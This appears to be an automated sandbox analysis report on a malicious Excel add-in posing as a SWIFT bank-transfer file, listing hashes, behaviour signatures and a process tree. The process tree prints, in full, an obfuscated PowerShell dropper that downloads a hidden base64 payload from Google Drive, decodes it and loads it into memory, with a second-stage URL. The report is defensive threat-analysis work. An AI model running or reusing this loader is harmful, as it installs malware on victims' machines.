Analysis
-
max time kernel
65s -
max time network
71s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
18-10-2024 11:35
General
-
Target
transferencia interbancaria_Swift_6647875.xlam
-
Size
597KB
-
MD5
b084fdb4d0c9b94ab31e3a762a8ceae9
-
SHA1
40118c7bde4f52645b341ee5dacca239eeb482ef
-
SHA256
c45d31e44d57ed25927e102efcfae85dd155f2496624c3958bdd4076d4e0b386
-
SHA512
c7a0b4175be14c6146a5016bcc733096b68acc1ec1a0c9078e3d8038ca3cb025cbff79ef5a85899a0e1b91c00b3e77086f8af1bf3da0f16030f172ce08dbeb17
-
SSDEEP
12288:YYoYZa3XGB29qpzJjEsC/KW2ZF4wtho8mDYEX4BLKLQ:PRw32XzJjHC/EHtho8mD1X41KM
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
exe.dropper
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\transferencia interbancaria_Swift_6647875.xlam"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\miraclefridaymanager.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnM3N4aW1hZ2VVcmwgPSBleUxodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTE3a1FJVEZKWjF0cWRxVFZ5YzhKeScrJ0tDUnNBYjA4M0Y0RyBleUw7M3N4d2ViQ2xpZW50ID0gTmV3LU9iamUnKydjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDszc3hpbWFnZUJ5dGVzID0gM3N4d2ViQ2xpZW50LkRvd25sb2FkRGF0YSgzc3hpbWFnZVVybCk7M3N4aW1hZycrJ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6JysnVVRGOC5HZXRTdHJpbmcoM3N4aW1hZ2VCeXRlcyk7M3N4c3RhcnRGbGEnKydnID0gZXlMPDxCQVNFNjRfU1RBUlQ+PmV5TDszc3hlbmRGbGFnID0gZXlMPDxCQVNFNjRfRU5EPj5leUw7M3N4c3RhcnRJJysnbmRleCA9IDNzeGltYWdlVGV4dC5JbmRleE9mKDNzeHN0YXInKyd0RmxhZycrJyk7M3N4ZW5kSW5kZXggPSAzc3hpbWFnZVRleHQuSW4nKydkZXhPZigzc3hlbmRGbGFnKTszc3hzdGFydEluZGV4IC1nZSAwIC1hbmQgM3N4ZW5kSW5kZScrJ3ggLWd0IDNzeHN0YXJ0SW5kZXg7M3N4c3RhcnRJbmRleCArPSAzc3hzdGFydEZsYWcuTGVuZ3RoOzNzeGJhc2UnKyc2NExlbmd0aCA9IDNzeGVuZEluZGV4IC0gM3N4c3RhcnRJbicrJ2RleDszc3hiYXNlNjRDb21tYW5kICcrJz0gM3N4aW1hZ2VUZXh0LlN1YnN0cmluZygzc3hzJysndGFydEluZGV4LCAzc3hiYXNlNjRMZW5ndGgpOzNzeGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKDNzeGJhc2U2NENvbW1hbmQuVG9DJysnaGFyQXJyYXkoKSBOS1kgRm9yRWFjaC1PYmonKydlY3QnKycgeyAzc3hfIH0pWy0xLi4tKDNzeGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07M3N4Y29tbWFuZEJ5dGVzID0gW1N5c3RlJysnbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygzc3hiYXNlNjRSZXZlcnNlZCk7M3N4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDNzeGNvbW1hbmRCJysneXRlcyk7M3N4dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChleUxWQUlleUwpOzNzeHZhaU1ldGhvZC5JbnZva2UoM3N4bnVsbCwgQChleUx0eHQuYmJiYmJiYmJiYmJld21hZGFtL2dyby5zbmRrY3VkLicrJ3JlZ2FuYW1sYWNvbHlhZGlyZi8vOnB0dGhleUwsIGV5TGRlc2F0aXZhZG9leUwsIGV5TGRlc2F0aXZhZG9leUwsJysnIGV5TGRlc2F0aXZhZG9leUwsIGV5TEFkZEluUHJvJysnY2VzczMyZXlMLCBleUxkZXNhdGl2YWRvZXlMLCBleUxkZXNhdGknKyd2YWRvZXlMKSk7JykgIC1SZXBsYWNlICAnTktZJyxbY2hhcl0xMjQgIC1SZXBsYWNlICczc3gnLFtjaGFyXTM2ICAtQ3JlcExBQ0UgICdleUwnLFtjaGFyXTM5KXwuKCAoW1NUckluR10kdkVyYm9zRXByZUZFcmVuY2UpWzEsM10rJ3gnLWpPaU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('3sximageUrl = eyLhttps://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8Jy'+'KCRsAb083F4G eyL;3sxwebClient = New-Obje'+'ct System.Net'+'.WebClient;3sximageBytes = 3sxwebClient.DownloadData(3sximageUrl);3sximag'+'eText = [System.Text.Encoding]::'+'UTF8.GetString(3sximageBytes);3sxstartFla'+'g = eyL<<BASE64_START>>eyL;3sxendFlag = eyL<<BASE64_END>>eyL;3sxstartI'+'ndex = 3sximageText.IndexOf(3sxstar'+'tFlag'+');3sxendIndex = 3sximageText.In'+'dexOf(3sxendFlag);3sxstartIndex -ge 0 -and 3sxendInde'+'x -gt 3sxstartIndex;3sxstartIndex += 3sxstartFlag.Length;3sxbase'+'64Length = 3sxendIndex - 3sxstartIn'+'dex;3sxbase64Command '+'= 3sximageText.Substring(3sxs'+'tartIndex, 3sxbase64Length);3sxbase64Reversed = -join (3sxbase64Command.ToC'+'harArray() NKY ForEach-Obj'+'ect'+' { 3sx_ })[-1..-(3sxbase64Command.Length)];3sxcommandBytes = [Syste'+'m.Convert]::FromBase64String(3sxbase64Reversed);3sxloadedAssembly = [System.Reflection.Assembly]::Load(3sxcommandB'+'ytes);3sxvaiMethod = [dnlib.IO.Home].GetMethod(eyLVAIeyL);3sxvaiMethod.Invoke(3sxnull, @(eyLtxt.bbbbbbbbbbbewmadam/gro.sndkcud.'+'reganamlacolyadirf//:pttheyL, eyLdesativadoeyL, eyLdesativadoeyL,'+' eyLdesativadoeyL, eyLAddInPro'+'cess32eyL, eyLdesativadoeyL, eyLdesati'+'vadoeyL));') -Replace 'NKY',[char]124 -Replace '3sx',[char]36 -CrepLACE 'eyL',[char]39)|.( ([STrInG]$vErbosEpreFErence)[1,3]+'x'-jOiN'')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD524debcc4a51b76762ce6da1ff6842d7b
SHA15fb12b12793ab7c8e3d83dcbdb1d84ac4acb6576
SHA2562df6d84470a652e68d2bb3de4e722577c93d040af23ba523cfe99174e28ed59f
SHA51256b41157b0f3a4d4bca3ecbc82db18c6f797e7bcf6fb55964a9f7e95c6eefc8b6f48d56320b60ebe807afd050a272a8e3f13e6614a24a3915704d94ef2f9825e
-
Filesize
191KB
MD5896de74c68c01322c2a62260440f6786
SHA17733c4904c691da91189b834320bc9a48d49cb35
SHA256a1bc35142d25d8d1847f7ba185d8eba87bb597fe0ae84fd32d091f2adcb01a8a
SHA512b3f592d3f25d11b9171d69ad119341c5dc8ea6ae6d8b5d8d1e7ccc6ea95128b618c3055b0d2e761c13d270b24b6a54daf2c3d3e106f175ec2adb828e1810ef66
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
44KB